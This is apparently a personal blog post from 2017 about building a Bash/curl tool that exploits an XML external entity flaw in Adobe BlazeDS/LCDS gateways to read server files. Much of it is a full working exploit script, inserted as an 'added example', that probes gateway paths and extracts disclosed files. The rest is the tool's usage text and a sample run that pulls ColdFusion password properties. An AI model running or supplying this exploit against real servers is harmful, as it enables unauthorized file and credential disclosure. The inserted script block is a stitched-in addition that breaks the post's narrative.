I've written my first exploit tool: XML injection in Adobe services leads to file disclosure

2017-04-07 21:35:00

Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".

I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper). 
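The request that this kind of script sends, as an added example that is not the author's adobe_xml_inject.sh and not the Metasploit module: a BlazeDS/LCDS AMFX gateway parses a CommandMessage with a DOCTYPE that declares an external entity pointing at a local file, and a vulnerable gateway expands the entity and echoes the file back inside the AcknowledgeMessage string that it returns. The gateway path list and the message layout below are reconstructed from the public PoC and are assumptions, as is the placeholder host target.example in the usage comment; curl is assumed to be in PATH.

```sh
#!/bin/sh
# Added example (not the author's adobe_xml_inject.sh): the AMFX external-entity
# file disclosure that Metasploit's adobe_xml_inject and Exploit-DB 11529 use
# against BlazeDS/LCDS gateways. The gateway paths and the CommandMessage layout
# are reconstructed from the public PoC and are assumptions.

# Gateway paths to probe (assumed list, mirrors the ones the Metasploit module tries).
GATEWAY_PATHS="/flex2gateway/ /flex2gateway/http /flex2gateway/httpsecure
/flex2gateway/cfamfpolling /flex2gateway/amf /flex2gateway/amfpolling
/messagebroker/http /messagebroker/httpsecure
/blazeds/messagebroker/http /blazeds/messagebroker/httpsecure
/samples/messagebroker/http /samples/messagebroker/httpsecure
/lcds/messagebroker/http /lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http /lcds-samples/messagebroker/httpsecure"

# build_payload FILE: print the AMFX document. The DOCTYPE declares entity x3 as
# SYSTEM FILE and &x3; sits in the messageId slot of the CommandMessage, so a
# gateway that resolves external entities sends the file contents back to us.
build_payload() {
  cat <<EOF
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "$1"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>
<object type="flex.messaging.messages.CommandMessage"><traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits /></object><null /><string /><string /><object><traits /></object>
<string>&x3;</string><int>5</int><int>0</int><int>0</int></object>
</body></amfx>
EOF
}

# disclosed_content: read a gateway reply on stdin and print the text of its
# longest <string> element. Trait names and the jsessionid header are short;
# the expanded entity (the file) is normally the longest string in the reply.
disclosed_content() {
  resp=$(cat); best=""
  while :; do
    case $resp in *'<string>'*'</string>'*) ;; *) break ;; esac
    resp=${resp#*'<string>'}        # drop through the next opening tag
    chunk=${resp%%'</string>'*}     # text of that element (may span lines)
    resp=${resp#*'</string>'}       # continue after its closing tag
    if [ ${#chunk} -gt ${#best} ]; then best=$chunk; fi
  done
  printf '%s' "$best"
}

# probe_gateways BASE FILE: POST the payload to every gateway path under BASE
# (e.g. http://target.example:8400, a placeholder), print "INFO code for URL"
# per path, and print the disclosed file for the first AcknowledgeMessage reply.
probe_gateways() {
  base=$1; file=$2; tmp=$(mktemp)
  payload=$(build_payload "$file")
  for p in $GATEWAY_PATHS; do
    code=$(printf '%s' "$payload" | curl -s -k -m 10 -H 'Content-Type: application/x-amf' \
             --data-binary @- -o "$tmp" -w '%{http_code}' "$base$p") || code=000
    echo "INFO $code for $base$p"
    if [ "$code" = 200 ] && grep -q AcknowledgeMessage "$tmp"; then
      echo "Read from $base$p"; disclosed_content < "$tmp"; echo; break
    fi
  done
  rm -f "$tmp"
}

# Usage: sh this.sh http://target.example:8400 /etc/passwd   (no network probe without args)
if [ $# -ge 1 ]; then probe_gateways "$1" "${2:-/etc/passwd}"; fi
```

The -k flag is there because these gateways are often behind self-signed HTTPS; drop it if you want certificate errors to surface. Picking the longest string is a heuristic: a gateway that returns an ErrorMessage with a long faultString will be skipped by the AcknowledgeMessage check, but a very long jsessionid could in principle win over a tiny file, so eyeball the output.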

I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh

I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs. 

EDIT: And it's up on Exploit-DB!

Here's a little show of what the script does!

root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -?

        adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file]

        -?   Show this help message.
        -d   Debug mode, outputs more kruft on stdout.
        -s   Use SSL / HTTPS, instead of HTTP.
        -b   Break on the first valid answer found.
        -h   Target host
        -p   Target port, defaults to 8400.
        -f   Full path to file to grab, defaults to /etc/passwd.

        This script exploits a known vulnerability in a set of Adobe applications. Using one
        of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
        normally inaccessible.

        NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example:
        adobe_xml_inject.sh -h -f c:\\coldfusion8\\lib\\password.properties
        adobe_xml_inject.sh -h -f 'c:\coldfusion8\lib\password.properties'

        This script relies on CURL, so please have it in your PATH.

root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h -p 80 -f 'c:\coldfusion8\lib\password.properties'
INFO 200 for
INFO 200 for
Read from
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header>
<body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits>
<string>#Fri Sep 23 18:27:15 PDT 2011
rdspassword=< redacted >
password=< redacted >
INFO 500 for
INFO 200 for
INFO 500 for
INFO 500 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for

